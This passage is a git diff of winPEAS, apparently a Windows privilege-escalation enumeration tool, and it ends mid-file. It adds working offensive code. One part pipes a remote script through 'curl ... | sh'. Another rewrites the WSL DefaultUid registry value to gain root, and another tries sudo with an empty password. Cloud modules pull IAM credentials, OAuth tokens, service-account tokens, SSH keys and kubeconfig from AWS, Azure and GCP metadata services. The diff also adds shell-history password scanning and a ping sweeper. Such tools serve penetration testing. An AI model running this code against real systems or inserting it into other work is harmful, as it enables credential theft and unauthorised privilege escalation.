+ + injectablePaths = result.Select(i => i).Distinct().ToList(); + return isInjectable; + } + public static bool CheckQuoteAndSpace(string path) { if (!path.Contains('"') && !path.Contains("'")) diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs b/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs index 51f0d15..7e76194 100644 --- a/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs +++ b/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs @@ -24,6 +24,40 @@ namespace winPEAS.Helpers.Registry return Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path); } + public static bool WriteRegValue(string hive, string path, string keyName, string value) + { + try + { + RegistryKey regKey; + if (hive == "HKCU") + { + regKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(path); + } + else if (hive == "HKU") + { + regKey = Microsoft.Win32.Registry.Users.OpenSubKey(path); + + } + else + { + regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path); + } + + if (regKey == null) + { + return false; + } + + regKey.SetValue(keyName, value, RegistryValueKind.String); + } + catch (Exception ex) + { + return false; + } + + return true; + } + public static string GetRegValue(string hive, string path, string value) { // returns a single registry value under the specified path in the specified hive (HKLM/HKCU) diff --git a/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs b/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs index d064d7d..cd106a2 100644 --- a/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs +++ b/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs @@ -5,8 +5,10 @@ using System.IO; using System.Linq; using System.Management; using System.Text.RegularExpressions; +using winPEAS.Checks; using winPEAS.Helpers; using winPEAS.Helpers.Registry; +using winPEAS.Helpers.YamlConfig; namespace winPEAS.Info.ApplicationInfo { @@ -256,6 +258,9 @@ namespace winPEAS.Info.ApplicationInfo { } + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths); + results.Add(new Dictionary() { {"Reg", autorunLocation[0] + "\\" + autorunLocation[1]}, @@ -274,7 +279,7 @@ namespace winPEAS.Info.ApplicationInfo "interestingFileRights", orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : "" }, - {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(filepath).ToString()} + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" } }); } } @@ -299,6 +304,9 @@ namespace winPEAS.Info.ApplicationInfo orig_filepath = Environment.ExpandEnvironmentVariables(orig_filepath).Replace("'", "").Replace("\"", ""); string folder = Path.GetDirectoryName(orig_filepath); + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(orig_filepath, out injectablePaths); + results.Add(new Dictionary() { {"Reg", autorunLocation[0] + "\\" + reg}, @@ -317,7 +325,7 @@ namespace winPEAS.Info.ApplicationInfo "interestingFileRights", orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : "" }, - {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(orig_filepath).ToString()} + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" } }); } } @@ -342,6 +350,12 @@ namespace winPEAS.Info.ApplicationInfo string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE")); usersPath = Directory.GetParent(usersPath).FullName; + var config = YamlConfigHelper.GetWindowsSearchConfig(); + var pwdInsideHistory = config.variables.FirstOrDefault(v => v.name.Equals("pwd_inside_history", StringComparison.InvariantCultureIgnoreCase)).value; + // add .* around each element to match the whole line + var items = pwdInsideHistory.Split('|').Select(v => $".*{v}.*"); + pwdInsideHistory = string.Join("|", items); + try { if (Directory.Exists(usersPath)) @@ -373,6 +387,14 @@ namespace winPEAS.Info.ApplicationInfo foreach (string filepath in files) { + var fileContent = File.ReadAllText(filepath); + var sensitiveInfoList = FileAnalysis.SearchContent(fileContent, pwdInsideHistory, false); + // remove all non-printable and control characters + sensitiveInfoList = sensitiveInfoList.Select(s => s = Regex.Replace(s, @"\p{C}+", string.Empty)).ToList(); + + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths); + string folder = Path.GetDirectoryName(filepath); results.Add(new Dictionary() { { "Reg", "" }, @@ -383,7 +405,8 @@ namespace winPEAS.Info.ApplicationInfo { "isWritableReg", ""}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))}, - { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() } + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }, + { "sensitiveInfoList", string.Join(", ", sensitiveInfoList) }, }); } } @@ -403,6 +426,9 @@ namespace winPEAS.Info.ApplicationInfo { try { + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(folder, out injectablePaths); + results.Add(new Dictionary() { { "Reg", "" }, { "RegKey", "" }, @@ -412,7 +438,7 @@ namespace winPEAS.Info.ApplicationInfo { "isWritableReg", ""}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFileRights", ""}, - { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(folder).ToString() } + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" } }); } catch (Exception) @@ -447,6 +473,9 @@ namespace winPEAS.Info.ApplicationInfo try { string folder = Path.GetDirectoryName(filepathCleaned); + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(command, out injectablePaths); + results.Add(new Dictionary() { {"Reg", ""}, @@ -463,7 +492,7 @@ namespace winPEAS.Info.ApplicationInfo "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs)) }, - {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(command).ToString()} + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" } }); } catch (Exception) @@ -505,6 +534,8 @@ namespace winPEAS.Info.ApplicationInfo if (File.Exists(path)) { string folder = Path.GetDirectoryName(path); + var injectablePaths = new List(); + var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(path, out injectablePaths); results.Add(new Dictionary { @@ -516,7 +547,7 @@ namespace winPEAS.Info.ApplicationInfo { "isWritableReg", ""}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(path, Checks.Checks.CurrentUserSiDs))}, - { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() } + {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" } }); } } diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs new file mode 100644 index 0000000..71e7bc1 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs @@ -0,0 +1,201 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Net; +using winPEAS.Helpers; + +namespace winPEAS.Info.CloudInfo +{ + internal class AWSInfo : CloudInfoBase + { + /* + * notes - possible identification: + * + - "c:\Program Files\Amazon\EC2Launch" + - "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe" + - "c:\Program Files (x86)\AWS SDK for .NET" + - get EC2_TOKEN: PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600", it should start with "AQ" + */ + + const string AWS_FOLDER = "c:\\Program Files\\Amazon\\"; + const string AWS_BASE_URL = "http://169.254.169.254/latest/api/token"; + const string METADATA_URL_BASE = "http://169.254.169.254/latest/meta-data"; + + + public override string Name => "AWS EC2"; + + private Dictionary> _endpointData = null; + + public override bool IsCloud => Directory.Exists(AWS_FOLDER); + + public override Dictionary> EndpointDataList() + { + if (_endpointData == null) + { + _endpointData = new Dictionary>(); + + try + { + if (IsAvailable) + { + string API_TOKEN = CreateMetadataAPIRequest(AWS_BASE_URL, "PUT", new WebHeaderCollection { { "X-aws-ec2-metadata-token-ttl-seconds", "21600" } }); + + _endpointData.Add("General Info", GetGeneralMetadataInfo(API_TOKEN)); + _endpointData.Add("Account Info", GetAccountMetadataInfo(API_TOKEN)); + _endpointData.Add("Network Info", GetNetworkMetadataInfo(API_TOKEN)); + _endpointData.Add("IAM Role", GetIAMRoleMetadataInfo(API_TOKEN)); + _endpointData.Add("User Data", GetUserDataMetadataInfo(API_TOKEN)); + _endpointData.Add("EC2 Security Credentials", GetSecurityCredentialsMetadataInfo(API_TOKEN)); + + /* + * print_3title "SSM Runnig" + ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED}," + * + */ + } + else + { + _endpointData.Add("General Info", new List() + { + new EndpointData() + { + EndpointName = "", + Data = null, + IsAttackVector = false + } + }); + } + } + catch (Exception ex) + { + Beaprint.PrintException(ex.Message); + } + } + + return _endpointData; + } + + private List GetSecurityCredentialsMetadataInfo(string apiToken) + { + var metadataEndpoints = new List>() + { + new Tuple("ec2-instance", "identity-credentials/ec2/security-credentials/ec2-instance", false), + }; + + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetUserDataMetadataInfo(string apiToken) + { + var metadataEndpoints = new List>() + { + new Tuple("user-data", "latest/user-data", false), + }; + + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetIAMRoleMetadataInfo(string apiToken) + { + var metadataEndpoints = new List> + { + new Tuple("iam/info", "iam/info", false) + }; + + var url = $"{METADATA_URL_BASE}/iam/security-credentials/"; + var roles = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } }); + + foreach (var role in roles.Split('\n')) + { + metadataEndpoints.Add(new Tuple(role, $"iam/security-credentials/{role}", false)); + } + + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetNetworkMetadataInfo(string apiToken) + { + var metadataEndpoints = new List>(); + + var url = $"{METADATA_URL_BASE}/network/interfaces/macs/"; + var macs = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } }); + var urlBase = "network/interfaces/macs"; + + foreach (var mac in macs.Split('\n')) + { + metadataEndpoints.Add(new Tuple("Owner ID", $"{urlBase}/{mac}/owner-id", false)); + metadataEndpoints.Add(new Tuple("Public Hostname", $"{urlBase}/{mac}/public-hostname", false)); + metadataEndpoints.Add(new Tuple("Security Groups", $"{urlBase}/{mac}/security-groups", false)); + metadataEndpoints.Add(new Tuple("Private IPv4s", $"{urlBase}/{mac}/ipv4-associations/", false)); + metadataEndpoints.Add(new Tuple("Subnet IPv4", $"{urlBase}/{mac}/subnet-ipv4-cidr-block", false)); + metadataEndpoints.Add(new Tuple("Private IPv6s", $"{urlBase}/{mac}/ipv6s", false)); + metadataEndpoints.Add(new Tuple("Subnet IPv6", $"{urlBase}/{mac}/subnet-ipv6-cidr-blocks", false)); + metadataEndpoints.Add(new Tuple("Public IPv4s", $"{urlBase}/{mac}/public-ipv4s", false)); + } + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetAccountMetadataInfo(string apiToken) + { + var metadataEndpoints = new List>() + { + new Tuple("account info", "identity-credentials/ec2/info", false), + }; + + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetGeneralMetadataInfo(string apiToken) + { + var metadataEndpoints = new List>() + { + new Tuple("ami id", "ami-id", false), + new Tuple("instance action","instance-action", false), + new Tuple("instance id","instance-id", false), + new Tuple("instance life-cycle","instance-life-cycle", false), + new Tuple("instance type","instance-type", false), + new Tuple("placement/region","placement/region", false), + }; + + var result = GetMetadataInfo(metadataEndpoints, apiToken); + + return result; + } + + private List GetMetadataInfo(List> endpointData, string apiToken) + { + List _endpointDataList = new List(); + + foreach (var tuple in endpointData) + { + string url = $"{METADATA_URL_BASE}/{tuple.Item2}"; + + var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } }); + + _endpointDataList.Add(new EndpointData() + { + EndpointName = tuple.Item1, + Data = result, + IsAttackVector = tuple.Item3 + }); + } + + return _endpointDataList; + } + + public override bool TestConnection() + { + return CreateMetadataAPIRequest(AWS_BASE_URL, "GET") != null; + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs new file mode 100644 index 0000000..e37f19f --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs @@ -0,0 +1,88 @@ +using System.Collections.Generic; +using System.IO; +using System.Net; +using System; + +namespace winPEAS.Info.CloudInfo +{ + internal class AzureInfo : CloudInfoBase + { + public override string Name => "Azure VM"; + public override bool IsCloud => Directory.Exists(WINDOWS_AZURE_FOLDER); + + private Dictionary> _endpointData = null; + + const string WINDOWS_AZURE_FOLDER = "c:\\windowsazure"; + const string AZURE_BASE_URL = "http://169.254.169.254/metadata/"; + const string API_VERSION = "2021-12-13"; + + public override Dictionary> EndpointDataList() + { + if (_endpointData == null) + { + _endpointData = new Dictionary>(); + List _endpointDataList = new List(); + + try + { + string result; + + List> endpoints = new List>() + { + new Tuple("Instance Details", $"instance?api-version={API_VERSION}", false), + new Tuple("Load Balancer details", $"loadbalancer?api-version={API_VERSION}", false), + new Tuple("Management token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://management.azure.com/", true), + new Tuple("Graph token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://graph.microsoft.com/", true), + new Tuple("Vault token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://vault.azure.net/", true), + new Tuple("Storage token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://storage.azure.com/", true) + }; + + if (IsAvailable) + { + + + foreach (var tuple in endpoints) + { + string url = $"{AZURE_BASE_URL}{tuple.Item2}"; + + result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "Metadata", "true" } }); + + _endpointDataList.Add(new EndpointData() + { + EndpointName = tuple.Item1, + Data = result, + IsAttackVector = tuple.Item3 + }); + } + + + } + else + { + foreach (var endpoint in endpoints) + { + _endpointDataList.Add(new EndpointData() + { + EndpointName = endpoint.Item1, + Data = null, + IsAttackVector = false + }); + } + } + + _endpointData.Add("General", _endpointDataList); + } + catch (Exception ex) + { + } + } + + return _endpointData; + } + + public override bool TestConnection() + { + return CreateMetadataAPIRequest(AZURE_BASE_URL, "GET") != null; + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs new file mode 100644 index 0000000..6827f08 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs @@ -0,0 +1,77 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Net; +using System.Net.Sockets; +using System.Text; + +namespace winPEAS.Info.CloudInfo +{ + internal abstract class CloudInfoBase + { + public abstract string Name { get; } + + public abstract bool IsCloud { get; } + + public abstract Dictionary> EndpointDataList(); + + public abstract bool TestConnection(); + + private bool? _isAvailable; + public bool IsAvailable + { + get + { + if (_isAvailable == null) + { + _isAvailable = TestConnection(); + } + + return _isAvailable.Value; + } + } + + protected string CreateMetadataAPIRequest(string url, string method, WebHeaderCollection headers = null) + { + try + { + var request = WebRequest.CreateHttp(url); + + if (headers != null) + { + request.Headers = headers; + } + + request.Method = method; + + using (var response = (HttpWebResponse)request.GetResponse()) + { + using (var responseStream = response.GetResponseStream()) + { + // Get a reader capable of reading the response stream + using (var myStreamReader = new StreamReader(responseStream, Encoding.UTF8)) + { + // Read stream content as string + var content = myStreamReader.ReadToEnd(); + + return content; + } + } + } + } + catch (WebException exception) + { + if (exception.InnerException != null) + { + return typeof(SocketException) == exception.InnerException.GetType() ? null : string.Empty; + } + } + catch (Exception ex) + { + return string.Empty; + } + + return string.Empty; + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs new file mode 100644 index 0000000..427486b --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs @@ -0,0 +1,10 @@ +namespace winPEAS.Info.CloudInfo +{ + internal class EndpointData + { + public string EndpointName { get; set; } + public string Data { get; set; } + + public bool IsAttackVector { get; set; } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs new file mode 100644 index 0000000..d393b57 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs @@ -0,0 +1,208 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Net; +using winPEAS.Helpers; + +namespace winPEAS.Info.CloudInfo +{ + internal class GCPInfo : CloudInfoBase + { + public override string Name => "Google Cloud Platform"; + + const string GCP_BASE_URL = "http://{URL_BASE}/"; + const string GCP_FOLDER = "C:\\Program Files\\Google\\Compute Engine\\"; + + /* + C:\Program Files\Google\Compute Engine\agent\GCEWindowsAgent.exe" + C:\Program Files\Google\OSConfig\google_osconfig_agent.exe" + c:\Program Files (x86)\Google\Cloud SDK" + http://metadata.google.internal + */ + + public override bool IsCloud => Directory.Exists(GCP_FOLDER); + + private Dictionary> _endpointData = null; + + const string METADATA_URL_BASE = "http://metadata.google.internal/computeMetadata/v1"; + + + public override Dictionary> EndpointDataList() + { + if (_endpointData == null) + { + _endpointData = new Dictionary>(); + + try + { + if (IsAvailable) + { + _endpointData.Add("GC Project Info", GetGCProjectMetadataInfo()); + _endpointData.Add("OSLogin Info", GetOSLoginMetadataInfo()); + _endpointData.Add("Instance Info", GetInstanceMetadataInfo()); + _endpointData.Add("Interfaces", GetInterfacesMetadataInfo()); + _endpointData.Add("User Data", GetUserMetadataInfo()); + _endpointData.Add("Service Accounts", GetServiceAccountsMetadataInfo()); + } + else + { + _endpointData.Add("General Info", new List() + { + new EndpointData() + { + EndpointName = "", + Data = null, + IsAttackVector = false + } + }); + } + } + catch (Exception ex) + { + Beaprint.PrintException(ex.Message); + } + } + + return _endpointData; + } + + private List GetServiceAccountsMetadataInfo() + { + var metadataEndpoints = new List>(); + + var serviceAccountsEndpointUrlBase = "instance/service-accounts"; + var url = $"{METADATA_URL_BASE}/{serviceAccountsEndpointUrlBase}"; + var serviceAccounts = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } }); + + // TODO + // echo " Name: $sa" - ignored for now + + foreach (var serviceAccount in serviceAccounts.Trim().Split('\n')) + { + metadataEndpoints.Add(new Tuple("Email", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}email", false)); + metadataEndpoints.Add(new Tuple("Aliases", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}aliases", false)); + metadataEndpoints.Add(new Tuple("Identity", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}identity", false)); + metadataEndpoints.Add(new Tuple("Scopes", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}scopes", false)); + metadataEndpoints.Add(new Tuple("Token", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}token", false)); + } + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + } + + private List GetUserMetadataInfo() + { + var metadataEndpoints = new List>() + { + new Tuple("startup-script", "instance/attributes/startup-script", false), + }; + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + } + + private List GetInterfacesMetadataInfo() + { + var metadataEndpoints = new List>(); + + var networkEndpointUrlBase = "instance/network-interfaces"; + var url = $"{METADATA_URL_BASE}/{networkEndpointUrlBase}"; + var ifaces = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } }); + + foreach (var iface in ifaces.Trim().Split('\n')) + { + metadataEndpoints.Add(new Tuple("IP", $"{networkEndpointUrlBase}/{iface}ip", false)); + metadataEndpoints.Add(new Tuple("Subnetmask", $"{networkEndpointUrlBase}/{iface}subnetmask", false)); + metadataEndpoints.Add(new Tuple("Gateway", $"{networkEndpointUrlBase}/{iface}gateway", false)); + metadataEndpoints.Add(new Tuple("DNS", $"{networkEndpointUrlBase}/{iface}dns-servers", false)); + metadataEndpoints.Add(new Tuple("Network", $"{networkEndpointUrlBase}/{iface}network", false)); + } + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + } + + private List GetInstanceMetadataInfo() + { + var metadataEndpoints = new List>() + { + new Tuple("Instance Description", "instance/description", false), + new Tuple("Hostname", "instance/hostname", false), + new Tuple("Instance ID", "instance/id", false), + new Tuple("Instance Image", "instance/image", false), + new Tuple("Machine Type", "instance/machine-type", false), + new Tuple("Instance Name", "instance/name", false), + new Tuple("Instance tags", "instance/scheduling/tags", false), + new Tuple("Zone", "instance/zone", false), + new Tuple("K8s Cluster Location", "instance/attributes/cluster-location", false), + new Tuple("K8s Cluster name", "instance/attributes/cluster-name", false), + new Tuple("K8s OSLoging enabled", "instance/attributes/enable-oslogin", false), + new Tuple("K8s Kube-labels", "instance/attributes/kube-labels", false), + new Tuple("K8s Kubeconfig", "instance/attributes/kubeconfig", false), + new Tuple("K8s Kube-env", "instance/attributes/kube-env", false), + }; + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + + } + private List GetOSLoginMetadataInfo() + { + var metadataEndpoints = new List>() + { + new Tuple("OSLogin users", "oslogin/users", false), + new Tuple("OSLogin Groups", "oslogin/groups", false), + new Tuple("OSLogin Security Keys", "oslogin/security-keys", false), + new Tuple("OSLogin Authorize", "oslogin/authorize", false), + }; + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + } + + private List GetGCProjectMetadataInfo() + { + var metadataEndpoints = new List>() + { + new Tuple("Project-ID", "project/project-id", false), + new Tuple("Project Number", "project/numeric-project-id", false), + new Tuple("Project SSH-Keys", "project/attributes/ssh-keys", false), + new Tuple("All Project Attributes", "project/attributes/?recursive=true", false), + }; + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + } + + private List GetMetadataInfo(List> endpointData) + { + List _endpointDataList = new List(); + + foreach (var tuple in endpointData) + { + string url = $"{METADATA_URL_BASE}/{tuple.Item2}"; + var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } }); + + _endpointDataList.Add(new EndpointData() + { + EndpointName = tuple.Item1, + Data = result?.Trim(), + IsAttackVector = tuple.Item3 + }); + } + + return _endpointDataList; + } + + public override bool TestConnection() + { + return CreateMetadataAPIRequest(GCP_BASE_URL, "GET") != null; + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs b/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs new file mode 100644 index 0000000..7cce295 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs @@ -0,0 +1,136 @@ +using System; +using System.Diagnostics; +using System.Text; +using winPEAS.Helpers.Registry; + +namespace winPEAS.Info.FilesInfo.WSL +{ + public class WSLHelper + { + public static void RunLinpeas(string linpeasUrl) + { + string linpeasCmd = $"curl -L {linpeasUrl} --silent | sh"; + var cmd = CreateUnixCommand(linpeasCmd); + + ExecuteCommand(cmd.Item1, cmd.Item2); + } + + internal static Tuple CreateUnixCommand(string command, string distributionName = null) + { + string wsl = Environment.Is64BitProcess + ? "wsl.exe" + : Environment.GetEnvironmentVariable("WinDir") + "\\SysNative\\wsl.exe"; + string distributionParam = !string.IsNullOrEmpty(distributionName) + ? $"--distribution {distributionName}" + : string.Empty; + string args = $"{distributionParam} -- {command}"; + + return new Tuple(wsl, args); + } + + static string GetWSLUser(string distributionName) + { + string command = "whoami"; + + var cmd = CreateUnixCommand(command, distributionName); + var user = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2)?.Trim(); + + return user; + } + + internal static string TryGetRootUser(string distributionName, string distributionGuid) + { + string hive = "HKCU"; + string path = @$"SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\{distributionGuid}"; + string key = "DefaultUid"; + string wslUser = GetWSLUser(distributionName); + string exploit = $"change registry value: '{hive}\\{path}\\{key}' to 0"; + string root = $"root ({exploit})"; + + if (string.Equals(wslUser, "root")) + { + return "root"; + } + var originalDefaultUserValue = RegistryHelper.GetRegValue(hive, path, key); + + var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString()); + if (isValueChanged) + { + wslUser = GetWSLUser(distributionName); + + if (string.Equals(wslUser, "root")) + { + RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue); + + return root; + } + } + + // try sudo without password + exploit = "sudo with empty password"; + var cmd = CreateUnixCommand("echo -n '' | sudo -S su root -c whoami", distributionName); + var output = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2); + + if (output == "root") + { + return $"root ({exploit})"; + } + + return wslUser; + } + + private static string ExecuteCommandWaitForOutput(string cmd, string args) + { + Process p = new Process(); + p.StartInfo.UseShellExecute = false; + p.StartInfo.RedirectStandardOutput = true; + p.StartInfo.RedirectStandardError = true; + p.StartInfo.FileName = cmd; + p.StartInfo.Arguments = args; + p.StartInfo.StandardOutputEncoding = Encoding.UTF8; + p.Start(); + + string output = p.StandardOutput.ReadToEnd()?.Trim(); + + p.WaitForExit(); + + return output; + } + + private static void ExecuteCommand( + string command, + string args = null, + string workingFolder = null + ) + { + var processStartInfo = new ProcessStartInfo + { + UseShellExecute = false, + Verb = "OPEN", + CreateNoWindow = true, + FileName = command, + WorkingDirectory = workingFolder, + Arguments = args, + RedirectStandardOutput = true, + RedirectStandardError = true, + StandardOutputEncoding = Encoding.UTF8 + }; + + using (var process = Process.Start(processStartInfo)) + { + if (process != null) + { + while (!process.StandardOutput.EndOfStream) + { + Console.WriteLine(process.StandardOutput.ReadLine()); + } + + while (!process.StandardError.EndOfStream) + { + Console.WriteLine(process.StandardError.ReadLine()); + } + } + } + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs new file mode 100644 index 0000000..298210a --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs @@ -0,0 +1,56 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Net.NetworkInformation; +using System.Threading.Tasks; + +namespace winPEAS.Info.NetworkInfo.NetworkScanner +{ + internal class NetPinger + { + private int PingTimeout = 1000; + + public List HostsAlive = new List(); + + private List ipRange = new List(); + + public void AddRange(string baseIpAddress, string netmask) + { + var addresses = NetworkUtils.GetIPAddressesByNetmask(baseIpAddress, netmask).ToList(); + var range = NetworkUtils.GetIPRange(IPAddress.Parse(addresses[0]), IPAddress.Parse(addresses[1])); + + ipRange.AddRange(range); + } + + public void AddRange(IEnumerable ipAddressList) + { + ipRange.AddRange(ipAddressList); + } + + public async Task RunPingSweepAsync() + { + var tasks = new List(); + + foreach (var ip in ipRange) + { + Ping p = new Ping(); + var task = PingAndUpdateStatus(p, ip); + tasks.Add(task); + } + + await Task.WhenAll(tasks); + } + + private async Task PingAndUpdateStatus(Ping ping, string ip) + { + var reply = await ping.SendPingAsync(ip, PingTimeout); + + if (reply.Status == IPStatus.Success) + { + HostsAlive.Add(ip); + await Console.Out.WriteLineAsync(ip); + } + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs new file mode 100644 index 0000000..d403b6e --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs @@ -0,0 +1,93 @@ +using System; +using System.Collections.Generic; +using System.Threading.Tasks; +using winPEAS.Helpers; + +namespace winPEAS.Info.NetworkInfo.NetworkScanner +{ + internal class NetworkScanner + { + enum ScanMode + { + Auto, + IPAddressList, + IPAddressNetmask, + } + + private string[] ipAddressList; + private bool isAuto = false; + private ScanMode scanMode = ScanMode.IPAddressList; + private string baseAddress; + private string netmask; + IEnumerable ports; + + public NetworkScanner(string options, IEnumerable ports = null) + { + /* + --network "auto" - find interfaces/hosts automatically + --network "10.10.10.10,10.10.10.20" - scan only selected ip address(es) + --network "10.10.10.10/24" - scan host based on ip address/netmask + */ + this.ports = ports; + + if (string.Equals(options, "auto", StringComparison.InvariantCultureIgnoreCase)) + { + scanMode = ScanMode.Auto; + } + else if (options.Contains("/")) + { + var parts = options.Split('/'); + baseAddress = parts[0]; + netmask = parts[1]; + scanMode = ScanMode.IPAddressNetmask; + } + else + { + ipAddressList = 